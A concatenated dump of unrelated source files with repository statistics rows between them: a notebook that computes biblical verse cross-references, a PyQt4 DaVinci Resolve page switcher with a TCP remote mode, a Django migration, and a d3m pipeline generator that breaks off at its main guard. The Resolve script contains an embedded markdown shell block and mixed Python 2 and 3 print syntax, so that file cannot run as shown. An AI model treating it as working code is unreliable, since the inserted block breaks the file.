return get_verse_w(L.d(o, otype="word")[0], ca=ca)
# In[ ]:
def get_verse_w(w, ca=False):
book = F.book.v(L.u(w, otype="book")[0])
chapter = F.chapter.v(L.u(w, otype="chapter")[0])
verse = F.verse.v(L.u(w, otype="verse")[0])
if ca:
ca = F.number.v(L.u(w, otype="clause_atom")[0])
return (book, chapter, verse, ca) if ca else (book, chapter, verse)
# In[ ]:
def key_verse(x):
return (book_rank[x[0]], int(x[1]), int(x[2]))
# In[ ]:
MAX_REFS = 10
# In[ ]:
def condensex(vlabels):
cnd = []
(cur_b, cur_c) = (None, None)
for (b, c, v, d) in vlabels:
sep = (
""
if cur_b is None
else ". "
if cur_b != b
else "; "
if cur_c != c
else ", "
)
show_b = b + " " if cur_b != b else ""
show_c = c + ":" if cur_b != b or cur_c != c else ""
(cur_b, cur_c) = (b, c)
cnd.append("{}{}{}{}{}".format(sep, show_b, show_c, v, d))
return cnd
# In[ ]:
dfields = """
book1
chapter1
verse1
book2
chapter2
verse2
similarity
""".strip().split()
# In[ ]:
dfields_fmt = ("{}\t" * (len(dfields) - 1)) + "{}\n"
# In[ ]:
def get_crossrefs():
global crossrefs
TF.info("CROSSREFS: Fetching crossrefs")
crossrefs_proto = {}
crossrefs = {}
(chunk_f, chunk_i, sim_m) = SHEBANQ_MATRIX
sim_thr = SHEBANQ_SIMILARITY
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
TF.info(
"CROSSREFS ({} {} {} S>{})".format(CHUNK_LBS[chunk_f], chunk_i, sim_m, sim_thr)
)
crossrefs_proto = {x for x in chunk_dist.items() if x[1] >= sim_thr}
TF.info(
"CROSSREFS ({} {} {} S>{}): found {} pairs".format(
CHUNK_LBS[chunk_f],
chunk_i,
sim_m,
sim_thr,
len(crossrefs_proto),
)
)
f = open(CROSSREF_DB_PATH, "w")
f.write("{}\n".format("\t".join(dfields)))
for ((x, y), d) in crossrefs_proto:
vx = get_verse(x)
vy = get_verse(y)
rd = int(round(d))
crossrefs.setdefault(x, {})[vy] = rd
crossrefs.setdefault(y, {})[vx] = rd
f.write(dfields_fmt.format(*(vx + vy + (rd,))))
total = sum(len(x) for x in crossrefs.values())
f.close()
TF.info(
"CROSSREFS: Found {} crossreferences and wrote {} pairs".format(
total, len(crossrefs_proto)
)
)
# In[ ]:
def get_specific_crossrefs(chunk_f, chunk_i, sim_m, sim_thr, write_to):
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
chunking(do_chunk)
preparing(do_prep)
similarity(do_sim)
TF.info("CROSSREFS: Fetching crossrefs")
crossrefs_proto = {}
crossrefs = {}
(do_chunk, do_prep, do_sim, do_clique, skip) = do_params(
chunk_f, chunk_i, sim_m, sim_thr
)
if skip:
return
TF.info(
"CROSSREFS ({} {} {} S>{})".format(CHUNK_LBS[chunk_f], chunk_i, sim_m, sim_thr)
)
crossrefs_proto = {x for x in chunk_dist.items() if x[1] >= sim_thr}
TF.info(
"CROSSREFS ({} {} {} S>{}): found {} pairs".format(
CHUNK_LBS[chunk_f],
chunk_i,
sim_m,
sim_thr,
len(crossrefs_proto),
)
)
f = open("files/{}".format(write_to), "w")
f.write("{}\n".format("\t".join(dfields)))
for ((x, y), d) in crossrefs_proto:
vx = get_verse(x)
vy = get_verse(y)
rd = int(round(d))
crossrefs.setdefault(x, {})[vy] = rd
crossrefs.setdefault(y, {})[vx] = rd
f.write(dfields_fmt.format(*(vx + vy + (rd,))))
total = sum(len(x) for x in crossrefs.values())
f.close()
TF.info(
"CROSSREFS: Found {} crossreferences and wrote {} pairs".format(
total, len(crossrefs_proto)
)
)
# In[ ]:
def compile_refs():
global refs_compiled
refs_grouped = []
for x in sorted(crossrefs):
refs = crossrefs[x]
vys = sorted(refs.keys(), key=key_verse)
currefs = []
for vy in vys:
nr = len(currefs)
if nr == MAX_REFS:
refs_grouped.append((x, tuple(currefs)))
currefs = []
currefs.append(vy)
if len(currefs):
refs_grouped.append((x, tuple(currefs)))
refs_compiled = []
for (x, vys) in refs_grouped:
vysd = [(vy[0], vy[1], vy[2], " ~{}%".format(crossrefs[x][vy])) for vy in vys]
vysl = condensex(vysd)
these_refs = []
for (i, vy) in enumerate(vysd):
link_text = vysl[i]
link_target = "{} {}:{}".format(vy[0], vy[1], vy[2])
these_refs.append("[{}]({})".format(link_text, link_target))
refs_compiled.append((x, " ".join(these_refs)))
TF.info(
"CROSSREFS: Compiled cross references into {} notes".format(len(refs_compiled))
)
# In[ ]:
def get_chapter_diffs():
global chapter_diffs
chapter_diffs = []
for cl in sorted(bin_cliques):
lb1 = "{} {}".format(F.book.v(cl[0][0]), F.chapter.v(cl[0][1]))
lb2 = "{} {}".format(F.book.v(cl[1][0]), F.chapter.v(cl[1][1]))
hfilename = "{}_vs_{}.html".format(lb1, lb2).replace(" ", "_")
chapter_diffs.append(
(
lb1,
cl[0][1],
lb2,
cl[1][1],
"{}/{}/{}/{}".format(
SHEBANQ_TOOL,
LOCAL_BASE_OUTP,
CHAPTER_DIR,
hfilename,
),
)
)
TF.info("CROSSREFS: Added {} chapter diffs".format(2 * len(chapter_diffs)))
# In[ ]:
def get_clique_refs():
global clique_refs
clique_refs = []
for (i, c) in enumerate(cliques):
for j in c:
seq = i // CLIQUES_PER_FILE
clique_refs.append(
(
j,
i,
"{}/{}/{}/{}/clique_{}_{}.html#c_{}".format(
SHEBANQ_TOOL,
LOCAL_BASE_OUTP,
EXPERIMENT_DIR,
base_name,
base_name,
seq,
i,
),
)
)
TF.info("CROSSREFS: Added {} clique references".format(len(clique_refs)))
# In[ ]:
sfields = """
version
book
chapter
verse
clause_atom
is_shared
is_published
status
keywords
ntext
""".strip().split()
# In[ ]:
sfields_fmt = ("{}\t" * (len(sfields) - 1)) + "{}\n"
# In[ ]:
def generate_notes():
with open(NOTES_PATH, "w") as f:
f.write("{}\n".format("\t".join(sfields)))
x = next(F.otype.s("word"))
(bk, ch, vs, ca) = get_verse(x, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"""The crossref notes are the result of a computation without manual tweaks.
Parameters: chunk by verse, similarity method SET with threshold 65.
[Here](tool=parallel) is an account of the generation method.""".replace(
"\n", " "
),
)
)
for (lb1, ch1, lb2, ch2, fl) in chapter_diffs:
(bk1, ch1, vs1, ca1) = get_verse_o(ch1, ca=True)
(bk2, ch2, vs2, ca2) = get_verse_o(ch2, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk1,
ch1,
vs1,
ca1,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"[chapter diff with {}](tool:{})".format(lb2, fl),
)
)
f.write(
sfields_fmt.format(
VERSION,
bk2,
ch2,
vs2,
ca2,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"[chapter diff with {}](tool:{})".format(lb1, fl),
)
)
for (x, refs) in refs_compiled:
(bk, ch, vs, ca) = get_verse(x, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
refs,
)
)
for (chunk, clique, fl) in clique_refs:
(bk, ch, vs, ca) = get_verse(chunk, ca=True)
f.write(
sfields_fmt.format(
VERSION,
bk,
ch,
vs,
ca,
"T",
"",
CROSSREF_STATUS,
CROSSREF_KEYWORD,
"[all variants (clique {})](tool:{})".format(clique, fl),
)
)
TF.info(
"CROSSREFS: Generated {} notes".format(
1 + len(refs_compiled) + 2 * len(chapter_diffs) + len(clique_refs)
)
)
# In[30]:
def crossrefs2shebanq():
expr = SHEBANQ_MATRIX + (SHEBANQ_SIMILARITY,)
do_experiment(*(expr + (True,)))
get_crossrefs()
compile_refs()
get_chapter_diffs()
get_clique_refs()
generate_notes()
# # 7. Main
#
# In the cell below you can select the experiments you want to carry out.
#
# The previous cells contain just definitions and parameters.
# The next cell will do work.
#
# If none of the matrices and cliques have been computed before on the system where this runs, doing all experiments might take multiple hours (4-8).
# In[ ]:
# In[ ]:
reset_params()
# do_experiment(False, 'sentence', 'LCS', 60, False)
# In[ ]:
do_all_experiments()
# do_all_experiments(no_fixed=True, only_object='chapter')
# crossrefs2shebanq()
# show_all_experiments()
# get_specific_crossrefs(False, 'verse', 'LCS', 60, 'crossrefs_lcs_db.txt')
# do_all_chunks()
# In[ ]:
# In[ ]:
HTML(ecss)
# # 8. Overview of the similarities
#
# Here are the plots of two similarity matrices
# * with verses as chunks and SET as similarity method
# * with verses as chunks and LCS as similarity method
#
# Horizontally you see the degree of similarity from 0 to 100%, vertically the number of pairs that have that (rounded) similarity. This axis is logarithmic.
# In[ ]:
# In[ ]:
do_experiment(False, "verse", "SET", 60, False)
distances = collections.Counter()
for (x, d) in chunk_dist.items():
distances[int(round(d))] += 1
# In[ ]:
x = range(MATRIX_THRESHOLD, 101)
fig = plt.figure(figsize=[15, 4])
plt.plot(x, [math.log(max((1, distances[y]))) for y in x], "b-")
plt.axis([MATRIX_THRESHOLD, 101, 0, 15])
plt.xlabel("similarity as %")
plt.ylabel("log # similarities")
plt.xticks(x, x, rotation="vertical")
plt.margins(0.2)
plt.subplots_adjust(bottom=0.15)
plt.title("distances")
# In[ ]:
# In[ ]:
do_experiment(False, "verse", "LCS", 60, False)
distances = collections.Counter()
for (x, d) in chunk_dist.items():
distances[int(round(d))] += 1
# In[ ]:
x = range(MATRIX_THRESHOLD, 101)
fig = plt.figure(figsize=[15, 4])
plt.plot(x, [math.log(max((1, distances[y]))) for y in x], "b-")
plt.axis([MATRIX_THRESHOLD, 101, 0, 15])
plt.xlabel("similarity as %")
plt.ylabel("log # similarities")
plt.xticks(x, x, rotation="vertical")
plt.margins(0.2)
plt.subplots_adjust(bottom=0.15)
plt.title("distances")
# In[ ]:
| 30.896048 | 6,888 | 0.579503 | 14,238 | 107,889 | 4.290982 | 0.114623 | 0.013749 | 0.009232 | 0.010737 | 0.373255 | 0.318209 | 0.266749 | 0.233374 | 0.215386 | 0.200818 | 0 | 0.023555 | 0.288167 | 107,889 | 3,491 | 6,889 | 30.904898 | 0.771963 | 0.355773 | 0 | 0.460823 | 0 | 0.005877 | 0.151934 | 0.017051 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028893 | false | 0.008815 | 0.007346 | 0.004897 | 0.056807 | 0.008815 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
# -*- coding: utf-8 -*-
# DaVinci Resolve scripting proof of concept. Resolve page external switcher.
# Local or TCP/IP control mode.
# Refer to Resolve V15 public beta 2 scripting API documentation for host setup.
# Copyright 2018 Igor Riđanović, www.hdhead.com
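# For reference, the host setup the comment above points at usually amounts to
# exporting the Resolve scripting environment variables before launching this
# script, so that `import DaVinciResolveScript` can succeed. The paths below
# are the common Linux defaults from the Resolve scripting README; they differ
# on macOS and Windows, so treat them as placeholders for your install:

```shell
# Linux default locations; adjust per platform as described in the
# Resolve scripting README shipped with the application.
export RESOLVE_SCRIPT_API="/opt/resolve/Developer/Scripting"
export RESOLVE_SCRIPT_LIB="/opt/resolve/libs/Fusion/fusionscript.so"
export PYTHONPATH="$PYTHONPATH:$RESOLVE_SCRIPT_API/Modules/"
```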
from PyQt4 import QtCore, QtGui
import sys
import socket
# If the API module is not found, assume we're running as a remote control
try:
import DaVinciResolveScript
    # Instantiate the Resolve object
resolve = DaVinciResolveScript.scriptapp('Resolve')
checkboxState = False
except ImportError:
    print('Resolve API not found.')
checkboxState = True
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8('Resolve Page Switcher'))
Form.resize(561, 88)
Form.setStyleSheet(_fromUtf8('background-color: #282828;\
border-color: #555555;\
color: #929292;\
font-size: 13px;'\
))
self.horizontalLayout = QtGui.QHBoxLayout(Form)
self.horizontalLayout.setObjectName(_fromUtf8('horizontalLayout'))
self.mediaButton = QtGui.QPushButton(Form)
self.mediaButton.setObjectName(_fromUtf8('mediaButton'))
self.horizontalLayout.addWidget(self.mediaButton)
self.editButton = QtGui.QPushButton(Form)
self.editButton.setObjectName(_fromUtf8('editButton'))
self.horizontalLayout.addWidget(self.editButton)
self.fusionButton = QtGui.QPushButton(Form)
self.fusionButton.setObjectName(_fromUtf8('fusionButton'))
self.horizontalLayout.addWidget(self.fusionButton)
self.colorButton = QtGui.QPushButton(Form)
self.colorButton.setObjectName(_fromUtf8('colorButton'))
self.horizontalLayout.addWidget(self.colorButton)
self.fairlightButton = QtGui.QPushButton(Form)
self.fairlightButton.setObjectName(_fromUtf8('fairlightButton'))
self.horizontalLayout.addWidget(self.fairlightButton)
self.deliverButton = QtGui.QPushButton(Form)
self.deliverButton.setObjectName(_fromUtf8('deliverButton'))
self.horizontalLayout.addWidget(self.deliverButton)
self.tcpipcheckBox = QtGui.QCheckBox(Form)
self.tcpipcheckBox.setObjectName(_fromUtf8('tcpipcheckBox'))
self.tcpipcheckBox.setChecked(checkboxState)
self.horizontalLayout.addWidget(self.tcpipcheckBox)
self.mediaButton.clicked.connect(lambda: self.pageswitch('media'))
self.editButton.clicked.connect(lambda: self.pageswitch('edit'))
self.fusionButton.clicked.connect(lambda: self.pageswitch('fusion'))
self.colorButton.clicked.connect(lambda: self.pageswitch('color'))
self.fairlightButton.clicked.connect(lambda: self.pageswitch('fairlight'))
self.deliverButton.clicked.connect(lambda: self.pageswitch('deliver'))
self.mediaButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.editButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.fusionButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.colorButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.fairlightButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.deliverButton.setStyleSheet(_fromUtf8('background-color: #181818;'))
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate('Resolve Page Switcher',\
'Resolve Page Switcher', None))
self.mediaButton.setText(_translate('Form', 'Media', None))
self.editButton.setText(_translate('Form', 'Edit', None))
self.fusionButton.setText(_translate('Form', 'Fusion', None))
self.colorButton.setText(_translate('Form', 'Color', None))
self.fairlightButton.setText(_translate('Form', 'Fairlight', None))
self.deliverButton.setText(_translate('Form', 'Deliver', None))
self.tcpipcheckBox.setText(_translate("Form", "TCP/IP remote", None))
def send(self, message):
s = socket.socket()
try:
s.connect((server, port))
except socket.error:
print 'Server unavailable. Exiting.'
s.send(message)
return s.recv(32)
def pageswitch(self, page):
# Send page name to server to switch remote Resolve's page
if self.tcpipcheckBox.isChecked():
response = self.send(page)
print 'Server echo:', response
# Switch local Resolve's page if API is available
else:
try:
resolve.OpenPage(page)
print 'Switched to', page
except NameError:
print 'Resolve API not found. Run in remote mode instead?'
if __name__ == '__main__':
# Assign server parameters
server = '192.168.1.1'
port = 7779
app = QtGui.QApplication(sys.argv)
Form = QtGui.QWidget()
ui = Ui_Form()
ui.setupUi(Form)
Form.show()
sys.exit(app.exec_())
| 36.91791 | 80 | 0.761472 | 559 | 4,947 | 6.665474 | 0.296959 | 0.050725 | 0.058239 | 0.067633 | 0.185185 | 0.118089 | 0.044015 | 0.044015 | 0.044015 | 0.044015 | 0 | 0.023766 | 0.115423 | 4,947 | 133 | 81 | 37.195489 | 0.827697 | 0.100061 | 0 | 0.084906 | 0 | 0 | 0.131081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.04717 | null | null | 0.04717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
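The remote mode of the page switcher above implies a companion TCP service on the Resolve host: the client sends the bare page name and reads back at most 32 bytes (`s.recv(32)`). That server is not part of the file, so the following is only a plausible Python 3 sketch of the counterpart pair; the `ok:` reply prefix and the single-connection helper are invented for illustration, and a real server would call `resolve.OpenPage(page)` where the comment indicates.

```python
import socket
import threading


def serve_once(host='127.0.0.1', port=0):
    """Accept one connection, read a page name, echo a short ack.

    port=0 lets the OS pick a free port; the chosen port is returned
    together with the server thread so a client knows where to connect.
    """
    srv = socket.socket()
    srv.bind((host, port))
    srv.listen(1)
    chosen_port = srv.getsockname()[1]

    def _run():
        conn, _addr = srv.accept()
        page = conn.recv(32).decode('utf-8')
        # A real server would call resolve.OpenPage(page) here.
        conn.sendall(('ok:' + page).encode('utf-8')[:32])
        conn.close()
        srv.close()

    t = threading.Thread(target=_run)
    t.start()
    return chosen_port, t


def send_page(page, host='127.0.0.1', port=7779):
    """Client side, mirroring Ui_Form.send() in Python 3."""
    s = socket.socket()
    s.connect((host, port))
    s.sendall(page.encode('utf-8'))
    reply = s.recv(32).decode('utf-8')
    s.close()
    return reply
```

Run together on localhost, `send_page('color', port=port)` returns the server's acknowledgement string.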
a15c583b91868493579d97f1c0cb3471ef7cba0e | 442 | py | Python | myaxf/migrations/0011_minebtns_is_used.py | Pyrans/test1806 | 1afc62e09bbebf74521b4b6fdafde8eeaa260ed9 | [
"Apache-2.0"
] | null | null | null | myaxf/migrations/0011_minebtns_is_used.py | Pyrans/test1806 | 1afc62e09bbebf74521b4b6fdafde8eeaa260ed9 | [
"Apache-2.0"
] | null | null | null | myaxf/migrations/0011_minebtns_is_used.py | Pyrans/test1806 | 1afc62e09bbebf74521b4b6fdafde8eeaa260ed9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-11-06 01:54
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('myaxf', '0010_minebtns'),
    ]

    operations = [
        migrations.AddField(
            model_name='minebtns',
            name='is_used',
            field=models.BooleanField(default=True),
        ),
    ]
| 21.047619 | 52 | 0.608597 | 48 | 442 | 5.4375 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.065217 | 0.271493 | 442 | 20 | 53 | 22.1 | 0.745342 | 0.153846 | 0 | 0 | 1 | 0 | 0.088949 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a15d6cd6a92c370d9583f2a5012f9737df67a02a | 10,453 | py | Python | generate_pipelines.py | phorne-uncharted/d3m-primitives | 77d900b9dd6ab4b2b330f4e969dabcdc419c73e1 | [
"MIT"
] | null | null | null | generate_pipelines.py | phorne-uncharted/d3m-primitives | 77d900b9dd6ab4b2b330f4e969dabcdc419c73e1 | [
"MIT"
] | null | null | null | generate_pipelines.py | phorne-uncharted/d3m-primitives | 77d900b9dd6ab4b2b330f4e969dabcdc419c73e1 | [
"MIT"
] | null | null | null | """
Utility to generate all submission pipelines for all primitives.
This script assumes that `generate_annotations.py` has already been run.
"""
import os
import subprocess
import shutil
import fire
from kf_d3m_primitives.data_preprocessing.data_cleaning.data_cleaning_pipeline import DataCleaningPipeline
from kf_d3m_primitives.data_preprocessing.text_summarization.duke_pipeline import DukePipeline
from kf_d3m_primitives.data_preprocessing.geocoding_forward.goat_forward_pipeline import GoatForwardPipeline
from kf_d3m_primitives.data_preprocessing.geocoding_reverse.goat_reverse_pipeline import GoatReversePipeline
from kf_d3m_primitives.data_preprocessing.data_typing.simon_pipeline import SimonPipeline
from kf_d3m_primitives.clustering.spectral_clustering.spectral_clustering_pipeline import SpectralClusteringPipeline
from kf_d3m_primitives.clustering.k_means.storc_pipeline import StorcPipeline
from kf_d3m_primitives.clustering.hdbscan.hdbscan_pipeline import HdbscanPipeline
from kf_d3m_primitives.dimensionality_reduction.tsne.tsne_pipeline import TsnePipeline
from kf_d3m_primitives.feature_selection.pca_features.pca_features_pipeline import PcaFeaturesPipeline
from kf_d3m_primitives.feature_selection.rf_features.rf_features_pipeline import RfFeaturesPipeline
from kf_d3m_primitives.natural_language_processing.sent2vec.sent2vec_pipeline import Sent2VecPipeline
from kf_d3m_primitives.object_detection.retinanet.object_detection_retinanet_pipeline import ObjectDetectionRNPipeline
from kf_d3m_primitives.image_classification.imagenet_transfer_learning.gator_pipeline import GatorPipeline
from kf_d3m_primitives.ts_classification.knn.kanine_pipeline import KaninePipeline
from kf_d3m_primitives.ts_classification.lstm_fcn.lstm_fcn_pipeline import LstmFcnPipeline
from kf_d3m_primitives.ts_forecasting.vector_autoregression.var_pipeline import VarPipeline
from kf_d3m_primitives.ts_forecasting.deep_ar.deepar_pipeline import DeepARPipeline
from kf_d3m_primitives.ts_forecasting.nbeats.nbeats_pipeline import NBEATSPipeline
from kf_d3m_primitives.remote_sensing.classifier.mlp_classifier_pipeline import MlpClassifierPipeline
def generate_pipelines(gpu=False):

    gpu_prims = [
        "d3m.primitives.classification.inceptionV3_image_feature.Gator",
        "d3m.primitives.object_detection.retina_net.ObjectDetectionRN",
        "d3m.primitives.time_series_classification.convolutional_neural_net.LSTM_FCN",
        "d3m.primitives.feature_extraction.nk_sent2vec.Sent2Vec",
        "d3m.primitives.remote_sensing.mlp.MlpClassifier",
    ]

    prims_to_pipelines = {
        "d3m.primitives.data_cleaning.column_type_profiler.Simon": [
            (SimonPipeline(), ('185_baseball_MIN_METADATA',))
        ],
        "d3m.primitives.data_cleaning.geocoding.Goat_forward": [
            (GoatForwardPipeline(), ('LL0_acled_reduced_MIN_METADATA',))
        ],
        "d3m.primitives.data_cleaning.geocoding.Goat_reverse": [
            (GoatReversePipeline(), ('LL0_acled_reduced_MIN_METADATA',))
        ],
        "d3m.primitives.feature_extraction.nk_sent2vec.Sent2Vec": [
            (Sent2VecPipeline(), ('LL1_TXT_CLS_apple_products_sentiment_MIN_METADATA',))
        ],
        "d3m.primitives.clustering.k_means.Sloth": [
            (StorcPipeline(), ('66_chlorineConcentration_MIN_METADATA',))
        ],
        "d3m.primitives.clustering.hdbscan.Hdbscan": [
            (HdbscanPipeline(), ('SEMI_1044_eye_movements_MIN_METADATA',))
        ],
        "d3m.primitives.clustering.spectral_graph.SpectralClustering": [
            (SpectralClusteringPipeline(), ('SEMI_1044_eye_movements_MIN_METADATA',))
        ],
        "d3m.primitives.dimensionality_reduction.t_distributed_stochastic_neighbor_embedding.Tsne": [
            (TsnePipeline(), ('SEMI_1044_eye_movements_MIN_METADATA',))
        ],
        "d3m.primitives.time_series_classification.k_neighbors.Kanine": [
            (KaninePipeline(), ('66_chlorineConcentration_MIN_METADATA',))
        ],
        "d3m.primitives.time_series_classification.convolutional_neural_net.LSTM_FCN": [
            (LstmFcnPipeline(), (
                '66_chlorineConcentration_MIN_METADATA',
                "LL1_Adiac_MIN_METADATA",
                "LL1_ArrowHead_MIN_METADATA",
                "LL1_Cricket_Y_MIN_METADATA",
                "LL1_ECG200_MIN_METADATA",
                "LL1_ElectricDevices_MIN_METADATA",
                "LL1_FISH_MIN_METADATA",
                "LL1_FaceFour_MIN_METADATA",
                "LL1_HandOutlines_MIN_METADATA",
                "LL1_Haptics_MIN_METADATA",
                "LL1_ItalyPowerDemand_MIN_METADATA",
                "LL1_Meat_MIN_METADATA",
                "LL1_OSULeaf_MIN_METADATA",
            )),
            (LstmFcnPipeline(attention_lstm=True), (
                '66_chlorineConcentration_MIN_METADATA',
                "LL1_Adiac_MIN_METADATA",
                "LL1_ArrowHead_MIN_METADATA",
                "LL1_Cricket_Y_MIN_METADATA",
                "LL1_ECG200_MIN_METADATA",
                "LL1_ElectricDevices_MIN_METADATA",
                "LL1_FISH_MIN_METADATA",
                "LL1_FaceFour_MIN_METADATA",
                "LL1_HandOutlines_MIN_METADATA",
                "LL1_Haptics_MIN_METADATA",
                "LL1_ItalyPowerDemand_MIN_METADATA",
                "LL1_Meat_MIN_METADATA",
                "LL1_OSULeaf_MIN_METADATA",
            ))
        ],
        "d3m.primitives.time_series_forecasting.vector_autoregression.VAR": [
            (VarPipeline(), (
                '56_sunspots_MIN_METADATA',
                '56_sunspots_monthly_MIN_METADATA',
                'LL1_736_population_spawn_MIN_METADATA',
                'LL1_736_stock_market_MIN_METADATA',
                'LL1_terra_canopy_height_long_form_s4_100_MIN_METADATA',
                "LL1_terra_canopy_height_long_form_s4_90_MIN_METADATA",
                "LL1_terra_canopy_height_long_form_s4_80_MIN_METADATA",
                "LL1_terra_canopy_height_long_form_s4_70_MIN_METADATA",
                'LL1_terra_leaf_angle_mean_long_form_s4_MIN_METADATA',
                'LL1_PHEM_Monthly_Malnutrition_MIN_METADATA',
                'LL1_PHEM_weeklyData_malnutrition_MIN_METADATA',
            ))
        ],
        "d3m.primitives.time_series_forecasting.lstm.DeepAR": [
            (DeepARPipeline(prediction_length=21, context_length=21), ('56_sunspots_MIN_METADATA',)),
            (DeepARPipeline(prediction_length=38, context_length=38), ('56_sunspots_monthly_MIN_METADATA',)),
            (DeepARPipeline(prediction_length=60, context_length=30), ('LL1_736_population_spawn_MIN_METADATA',)),
            (DeepARPipeline(prediction_length=34, context_length=17), ('LL1_736_stock_market_MIN_METADATA',)),
        ],
        "d3m.primitives.time_series_forecasting.feed_forward_neural_net.NBEATS": [
            (NBEATSPipeline(prediction_length=21), ('56_sunspots_MIN_METADATA',)),
            (NBEATSPipeline(prediction_length=38), ('56_sunspots_monthly_MIN_METADATA',)),
            (NBEATSPipeline(prediction_length=60), ('LL1_736_population_spawn_MIN_METADATA',)),
            (NBEATSPipeline(prediction_length=34), ('LL1_736_stock_market_MIN_METADATA',)),
        ],
        "d3m.primitives.object_detection.retina_net.ObjectDetectionRN": [
            (ObjectDetectionRNPipeline(), (
                'LL1_tidy_terra_panicle_detection_MIN_METADATA',
                'LL1_penn_fudan_pedestrian_MIN_METADATA'
            ))
        ],
        "d3m.primitives.data_cleaning.data_cleaning.Datacleaning": [
            (DataCleaningPipeline(), ('185_baseball_MIN_METADATA',))
        ],
        "d3m.primitives.data_cleaning.text_summarization.Duke": [
            (DukePipeline(), ('185_baseball_MIN_METADATA',))
        ],
        "d3m.primitives.feature_selection.pca_features.Pcafeatures": [
            (PcaFeaturesPipeline(), ('185_baseball_MIN_METADATA',))
        ],
        "d3m.primitives.feature_selection.rffeatures.Rffeatures": [
            (RfFeaturesPipeline(), ('185_baseball_MIN_METADATA',))
        ],
        "d3m.primitives.classification.inceptionV3_image_feature.Gator": [
            (GatorPipeline(), (
                "124_174_cifar10_MIN_METADATA",
                "124_188_usps_MIN_METADATA",
                "124_214_coil20_MIN_METADATA",
                "uu_101_object_categories_MIN_METADATA",
            ))
        ],
        "d3m.primitives.remote_sensing.mlp.MlpClassifier": [
            (MlpClassifierPipeline(), ('LL1_bigearth_landuse_detection',))
        ]
    }

    for primitive, pipelines in prims_to_pipelines.items():
        if gpu:
            if primitive not in gpu_prims:
                continue
        else:
            if primitive in gpu_prims:
                continue
        os.chdir(f'/annotations/{primitive}')
        os.chdir(os.listdir('.')[0])
        if not os.path.isdir('pipelines'):
            os.mkdir('pipelines')
        else:
            for pipeline_file in os.listdir('pipelines'):
                os.remove(f'pipelines/{pipeline_file}')
        if not os.path.isdir('pipeline_runs'):
            os.mkdir('pipeline_runs')
        else:
            for pipeline_run in os.listdir('pipeline_runs'):
                os.remove(f'pipeline_runs/{pipeline_run}')
        if not os.path.isdir(f'/pipeline_scores/{primitive.split(".")[-1]}'):
            os.mkdir(f'/pipeline_scores/{primitive.split(".")[-1]}')
        for pipeline, datasets in pipelines:
            pipeline.write_pipeline(output_dir='./pipelines')
            for dataset in datasets:
                print(f'Generating pipeline for {primitive.split(".")[-1]} on {dataset}')
                if primitive.split(".")[-1] in ['Duke', 'Sloth']:
                    pipeline.fit_produce(
                        dataset,
                        output_yml_dir='./pipeline_runs',
                        submission=True
                    )
                else:
                    if primitive.split(".")[-1] == 'NBEATS':
                        shutil.rmtree('/scratch_dir/nbeats')
                    pipeline.fit_score(
                        dataset,
                        output_yml_dir='./pipeline_runs',
                        output_score_dir=f'/pipeline_scores/{primitive.split(".")[-1]}',
                        submission=True
                    )
        os.system('gzip -r pipeline_runs')
if __name__ == '__main__':
